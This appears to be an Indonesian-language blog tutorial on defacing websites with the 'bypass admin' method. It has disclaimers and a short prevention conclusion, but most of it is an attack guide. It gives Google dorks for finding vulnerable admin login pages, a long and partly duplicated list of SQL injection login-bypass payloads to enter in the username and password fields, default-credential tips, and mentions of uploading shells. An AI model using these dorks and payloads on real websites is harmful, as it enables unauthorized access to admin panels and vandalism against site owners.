Deface adalah istilah yang digunakan untuk mengubah tampilan suatu halaman web dengan cara yang tidak diinginkan oleh pemiliknya. Meskipun ini adalah tindakan ilegal dan melanggar hukum, penting bagi pemilik website untuk mengetahui cara-cara yang dapat digunakan oleh pihak yang tidak bertanggung jawab untuk melakukan deface. Dalam artikel ini, kami akan membahas salah satu metode yang sering digunakan dalam deface, yaitu metode bypass admin. Kami akan menjelaskan secara rinci tentang metode ini, tetapi ingatlah bahwa pengetahuan ini harus digunakan hanya untuk tujuan yang sah dan bertanggung jawab.
Apa itu Metode Bypass Admin?
Metode bypass admin adalah teknik yang digunakan untuk mengakses halaman administrasi atau panel kontrol suatu situs web tanpa harus memasukkan informasi login yang benar. Dalam beberapa kasus, website yang tidak memperhatikan keamanan yang memadai dapat rentan terhadap serangan menggunakan metode ini. Ini berarti bahwa seorang penyerang dengan pengetahuan teknis yang cukup dapat mendapatkan akses ke panel admin dan melakukan perubahan yang tidak diinginkan pada halaman web.
Langkah-langkah dalam Melakukan Deface dengan Metode Bypass Admin
Berikut adalah langkah-langkah umum yang digunakan dalam melakukan deface dengan metode bypass admin:
1. Dorking
Langkah pertama adalah dorking, dorking gunanya untuk mencari target website yang akan di deface. Fungsi dorking adalah mencari tujuan yang kita inginkan berdasarkan keyword yang kita tulis. Carilah website yang akan di deface menggunakan dork berikut ini:
Admin.php?id=
Admin/login.php
Login.php intitle:"admin login"
Login.php intitle:"admin area "
Login.php intitle:"administrator "
Administrator.php
Setelah kalian menyalin salah satu keyword diatas lalu paste pada kolom pencarian google, carilah sampai ketemu website yang vuln atau rentan.
Perlu diingat bahwa kalian juga harus mengembangkan dorknya seperti menambahkan target negara tertentu, misalnya site:uk site:id site:de
2. Mengeksploitasi Kerentanan Website
Setelah kerentanan teridentifikasi, penyerang akan mencoba mengeksploitasi kerentanan tersebut. Mereka akan menggunakan teknik-teknik tertentu, seperti memasukkan kode berbahaya atau menyuntikkan script yang berbahaya, untuk mendapatkan akses ke panel admin.
Anda bisa menggunakan beberapa kode inject bypass admin dibawah ini untuk bisa masuk ke panel admin.
' or 1=1 limit 1 -- -+
'=''OR'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Masukkan kode tersebut pada kolom username dan password, terkadang sebuah website masih menggunakan data login default jadi lebih mudah diretas. Seperti username admin dan passwordnya juga admin.
3. Mengubah Tampilan Halaman Web
Setelah berhasil mendapatkan akses ke panel admin, peretas dapat mengubah tampilan halaman web sesuai keinginan mereka. Mereka dapat mengganti gambar latar belakang, menambahkan pesan deface, atau bahkan menghapus seluruh konten yang ada.
Biasanya para peretas mengupload shell atau script deface mereka, namun ada juga diantara mereka yang justru melaporkan bug tersebut kepada owner si pemilik website tersebut. Tindakan tersebut dinamakan bug bounty atau bug hunter.
KESIMPULAN
Metode bypass admin adalah salah satu teknik yang dapat digunakan oleh penyerang untuk melakukan deface pada halaman web. Pemilik website harus memahami kerentanan potensial dan mengambil langkah-langkah keamanan yang tepat untuk melindungi website mereka dari serangan. Menjaga sistem dan perangkat lunak diperbarui, menggunakan kata sandi yang kuat, dan menerapkan proteksi WAF adalah beberapa langkah yang dapat membantu mencegah serangan dengan metode bypass admin.
Jangan pernah menggunakan pengetahuan ini untuk melakukan tindakan ilegal atau melanggar privasi orang lain. Menggunakan keahlian secara bertanggung jawab adalah prinsip yang harus dipegang oleh semua profesional di bidang teknologi informasi.
Sekian tutorial dari kami semoga bermanfaat dan jangan lupa share artikel ini ya, supaya orang lain juga dapat ilmu
0 Comments